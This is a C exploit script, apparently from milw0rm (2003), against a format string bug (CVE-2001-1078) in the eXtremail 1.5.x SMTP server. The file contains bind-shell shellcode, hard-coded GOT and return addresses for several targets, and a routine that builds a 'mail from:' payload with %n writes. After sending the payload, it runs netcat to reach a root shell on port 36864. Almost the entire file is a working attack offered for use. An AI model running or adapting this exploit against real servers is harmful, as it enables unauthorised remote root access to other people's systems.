eXtremail 1.5.x (Linux) - Remote Format Strings - CVE-2001-1078

1. /****************************************************************/
2. /*      Linux eXtremail 1.5.x Remote Format Strings Exploit                 */
3. /*                                                                                                  */
4. /*                          */
5. /*                                 By B-r00t - 02/07/2003           */
6. /*                          */
7. /*  Versions:       Linux eXtremail-1.5-8 => VULNERABLE     */
8. /*          Linux eXtremail-1.5-5 => VULNERABLE     */
9. /*  Exploit uses format strings bug in fLog() of smtpd to bind a    */
10. /*  r00tshell to port 36864 on the target eXtremail server.     */
11. /*                          */
12. /****************************************************************/
13.  
14. #include <stdlib.h>
15. #include <stdio.h>
16. #include <string.h>
17. #include <sys/types.h>
18. #include <sys/socket.h>
19. #include <netinet/in.h>
20. #include <arpa/inet.h>
21. #include <unistd.h>
22.  
23. #define EXPLOIT "eXtreme"
24. #define DEST_PORT 25
25.  
26. // Prototypes
27. int get_sock (char *host);
28. int send_sock (char *stuff);
29. int read_sock (void);
30. void usage (void);
31. int do_it (void);
32.  
33. // Globals
34. int socketfd, choice;
35. unsigned long GOT, RET;
36. char *myip;
37. char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
38. char shellcode[] =
39. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
40. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
41. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
42. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
43. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
44. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
45. "\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
46. "\x40\x89\xc3\x89\x46\x0c\x40\x89"
47. "\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
48. "\x80\x43\xc6\x46\x10\x10\x88\x46"
49. "\x08\x31\xc0\x31\xd2\x89\x46\x18"
50. "\xb0\x90\x66\x89\x46\x16\x8d\x4e"
51. "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
52. "\x66\xcd\x80\x89\x5e\x0c\x43\x43"
53. "\xb0\x66\xcd\x80\x89\x56\x0c\x89"
54. "\x56\x10\xb0\x66\x43\xcd\x80\x86"
55. "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
56. "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
57. "\x80\x88\x56\x07\x89\x76\x0c\x87"
58. "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
59. "\xe8\x8d\xff\xff\xff\x2f\x62\x69"
60. "\x6e\x2f\x73\x68";
61.  
62.  
63. struct {
64.         char *systemtype;
65.         unsigned long got;
66.         unsigned long ret;
67.         int pad;
68.         int buf;
69.         int pos;
70. } targets[] = {
71.     // Confirmed targets tested by B-r00t.
72.         { "RedHat 7.2 eXtremail V1.5 release 5
73. (eXtremail-1.5-5.i686.rpm)",   0x0813b19c, 0xbefff1e8, 1, 266, 44},
74.         { "Linux ANY eXtremail V1.5 release 5
75. (eXtremail-1.5-5.tar.gz)",   0x0813b19c, 0xbefff1b8, 1, 266, 44},
76.     { "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",   0xbefff0c8,
77. 0xbefff1d4, 1, 266, 44},
78.         { "eXtremail V1.5 DEBUG",   0x44434241, 0xaaaaaaaa, 1, 266,
79. 44},
80.         { 0 }
81.     };
82.  
83. int main ( int argc, char *argv[] )
84. {
85. char *TARGET = "TARGET";
86.  
87. printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n",
88. EXPLOIT);
89.  
90. if (argc < 3)
91. usage ();
92.  
93. choice = atoi(argv[2]);
94. if (choice < 0 || choice > 3)
95. usage ();
96.  
97. setenv (TARGET, argv[1], 1);
98.  
99. get_sock(argv[1]);
100. sleep (1);
101. read_sock ();
102. sleep (1);
103. send_sock (helo);
104. sleep (1);
105. read_sock ();
106. sleep(1);
107. do_it ();
108. }
109.  
110.  
111. void usage (void)
112. {
113.         int loop;
114.     printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
115.         printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
116.     for (loop = 0; targets[loop].systemtype; loop++)
117.             printf ("\n%d\t%s", loop, targets[loop].systemtype);
118.         printf ("\n\nOn success a r00tshell will be spawned on port
119. 36864.\n\n");
120.     exit (-1);
121.         }
122.  
123.  
124. int get_sock (char *host)
125. {
126. struct sockaddr_in dest_addr;
127.  
128. if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
129.         perror("Socket Error!\n");
130.         exit (-1);
131.         }
132.  
133. dest_addr.sin_family = AF_INET;
134. dest_addr.sin_port = htons(DEST_PORT);
135. if (! inet_aton(host, &(dest_addr.sin_addr))) {
136.         perror("inet_aton problems\n");
137.         exit (-2);
138.         }
139.  
140. memset( &(dest_addr.sin_zero), '\0', 8);
141. if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
142. sockaddr)) == -1){
143.         perror("Connect failed!\n");
144.         close (socketfd);
145.         exit (-3);
146.         }
147. printf ("\n\nConnected to %s\n", host);
148. }
149.  
150.  
151.  
152. int send_sock (char *stuff)
153. {
154.     int bytes;
155.         bytes = (send (socketfd, stuff, strlen(stuff), 0));
156.         if (bytes == -1) {
157.         perror("Send error");
158.         close (socketfd);
159.         exit(4);
160.     }
161. printf ("Send:\t%s", stuff);
162. return bytes;
163. }
164.  
165.  
166. int read_sock (void)
167. {
168.         int bytes;
169.     char buffer[200];
170.     char *ptr;
171.     ptr = buffer;
172.     memset (buffer, '\0', sizeof(buffer));
173.         bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
174.         if (bytes == -1) {
175.         perror("send error");
176.         close (socketfd);
177.         exit(4);
178.     }
179. printf ("Recv:\t%s", buffer);
180. return bytes;
181. }
182.  
183.  
184. int do_it (void)
185. {
186. char format[200], buf[500], *bufptr, *p;
187. int loop, sofar = 0;
188. int PAD = targets[choice].pad;
189. int POS = targets[choice].pos;
190. unsigned char r[3], g[3], w[3];
191.  
192. RET = targets[choice].ret;
193. r[0] = (int) (RET & 0x000000ff);
194. r[1] = (int)((RET & 0x0000ff00) >> 8);
195. r[2] = (int)((RET & 0x00ff0000) >> 16);
196. r[3] = (int)((RET & 0xff000000) >> 24);
197.  
198. GOT = targets[choice].got;
199. g[0] = (int) (GOT & 0x000000ff);
200. g[1] = (int)((GOT & 0x0000ff00) >> 8);
201. g[2] = (int)((GOT & 0x00ff0000) >> 16);
202. g[3] = (int)((GOT & 0xff000000) >> 24);
203.  
204.  
205. // Start buf
206. bufptr = buf;
207. bzero (bufptr, sizeof(buf));
208. strncpy (buf, "mail from: ", strlen("mail from: "));
209. sofar = 19;
210.  
211. // Do padding
212. for (loop=0; loop<PAD; loop++)
213. strncat (buf, "a", 1);
214. sofar = sofar+PAD;
215.  
216. //1st GOT addy
217. strncat (buf, g, 4);
218.  
219. //2nd GOT addy
220. p = &g[0];
221. (*p)++;
222. strncat (buf, g, 4);
223.  
224. // 3rd GOT addy
225. p = &g[0];
226. (*p)++;
227. strncat (buf, g, 4);
228.  
229. // 4th GOT addy
230. p = &g[0];
231. (*p)++;
232. strncat (buf, g, 4);
233. sofar = sofar+16;
234.  
235. for (loop=0; loop<4; loop++) {
236.             if (r[loop] > sofar) {
237.                         w[loop] = r[loop]-sofar;
238.                         } else
239.             if (r[loop] == sofar) {
240.                         w[loop] = 0;
241.                         }else
242.             if (r[loop] < sofar) {
243.                         w[loop] = (256-sofar)+r[loop];
244.                         }
245.             sofar = sofar+w[loop];
246.             }
247.  
248. bufptr = format;
249. bzero (bufptr, sizeof(format));
250. sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",
251. w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
252. strncat (buf, format, sizeof(format));
253. strncat (buf, shellcode, sizeof(shellcode));
254.  
255. // Summarise
256. printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
257. printf ("\nWrite Addy:\t\t0x%x", GOT);
258. printf ("\nRET (shellcode):\t0x%x", RET);
259. printf ("\nPAD (alignment):\t%d", PAD);
260. printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf),
261. targets[choice].buf);
262. printf ("\nSending it ... \n");
263. sleep(1);
264.  
265. // Ok lets Wack it!
266. send_sock (buf);
267. sleep (1);
268. close (socketfd);
269. printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864
270. ....!!!!!\n\n\n");
271. sleep(3); // May take time to spawn a shell
272. system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
273. exit (0);
274. }
275.  
276. // milw0rm.com [2003-07-02]